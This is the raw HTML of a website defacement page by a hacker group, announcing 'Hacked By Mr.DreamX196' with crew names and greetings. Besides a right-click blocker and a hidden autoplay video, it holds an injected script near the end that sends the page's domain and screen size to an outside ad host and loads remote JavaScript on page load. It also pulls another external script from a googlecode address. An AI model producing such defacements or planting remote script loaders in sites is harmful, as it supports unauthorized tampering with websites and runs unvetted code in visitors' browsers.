

<html>
<head>
<title> Hacked By Mr.DreamX196 | Indonesian Intelegent Security </title>
</head>
<script type="text/javascript">

<!--

//Disable right click script

//visit http://www.rainbow.arch.scriptmania.com/scripts/

var message="Sorry, right-click has been disabled";

///////////////////////////////////

function clickIE() {if (document.all) {(message);return false;}}

function clickNS(e) {if

(document.layers||(document.getElementById&&!document.all)) {

if (e.which==2||e.which==3) {(message);return false;}}}

if (document.layers)

{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}

else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}

document.oncontextmenu=new Function("return false")

// -->

</script>

<!-- <script language="JavaScript1.2" type="text/javascript">

function ClearError() {return true;}

window.onerror = ClearError;

</script> -->
<body bgcolor="black">
<br><br>
<center>
<link href='http://fonts.googleapis.com/css?family=Megrim' rel='stylesheet' type='text/css'>
<font face="Megrim" size="99" color="white">Indonesian Intelegent Security </font><br>
<center><img src="http://fajar.co.id/wp-content/uploads/2015/05/party.jpg" width=40%> </center>
<br>
<center>
<br><p align="center">&nbsp;</p>
<link href='http://fonts.googleapis.com/css?family=Quicksand' rel='stylesheet' type='text/css'>
<font face="Quicksand" size="3" color="white"> # We party in your system # </font> <br>
<link href='http://fonts.googleapis.com/css?family=Josefin Sans' rel='stylesheet' type='text/css'>
<font face="Josefin Sans" size="4" color="white"> Mr.DreamX196 | AnoaGhost | Mr.Syntax_Error | 51N1CH1 | Mr.XSecr3t | Mr.Guy | Unknown~X | YaroiDariko | Mr.Optimuz_r00t</font>
<br><br>
<font face="Quicksand" size="3" color="white">./Hacked By Mr.DreamX196</font> <br>
<hr><br>
<font face="Quicksand" size="3" color="white">Greetz to : ./Dzikri Dot ID - 3L-MUH4J1M1 - Muslim Cyber Corporation - Thoby69  - FadliDotID_007</font> <br>

<embed src="https://www.youtube.com/v/gloY_KIMnls&autoplay=1" 

type="application/x-shockwave-flash" wmode="transparent" width="1" 

height="1"></embed> > <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnt8TXuIGQG32%2fSd9j%2f3mcNQL1%2f%2fGDxQf1OSJIU%2brI9w8VKlkp2IWMeB3an2eV64yvZF1Tslrjy5nJ15DtH5gLw53ZRXZQIBpgIVzg%2blYyxeG9p2M6f8tw1V4AjCd152ui1%2fWYd3d6jYWMN8ogu%2f7RM50NKtGRZSUxOvhzAyfEh5Wh97LjLatHJjHIygMjDnTbFOuNqTeoZYOr24wlusu6zssAbnuA1k18C4Zj2ZVlsmIw7%2buFpWgbIlqQbN6qr5dJ5eoCULDETkaccorW4S5O0KYp%2boIaAN%2b6e7GlpLFx%2bE6kfrcFQhxiZOt%2bFgILPtJipZyH5D8oYly2MCy6kcvZ6sS%2bSemvJFrr7%2bpSC8z57LtOlEY6dpecP6QckeBPTwlr7D3%2bf2WgIbmhsU5ILDgCDAOTQTVGZ%2fU1ZAwNqxwPreTVb76G9Dp5OJ0BWYQJoT29e8yhLPljjbz0doZKj3MLIIVBg%2b1plbcMYQw4l36IreMva%2b38S6pUy9zLyJFIiqzfY%2fsbuEP%2b2N82jn5HNAJBQ0zwF3MXmSl0MVe9kgOcz2LRerrrDisAKe5OFDzaFqqK" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
<script src='http://the-kampoeng-

blogger.googlecode.com/files/Salju.js' 

type='text/javascript'></script>
</body>
</html>